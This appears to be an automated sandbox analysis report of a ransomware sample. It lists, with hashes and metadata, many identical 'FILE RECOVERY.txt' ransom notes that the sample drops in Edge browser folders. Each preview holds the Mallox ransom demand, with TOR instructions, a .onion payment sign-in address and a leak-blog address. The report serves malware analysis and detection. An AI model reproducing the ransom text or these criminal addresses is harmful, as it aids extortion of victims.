                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\FILE RECOVERY.txt

                        Download File
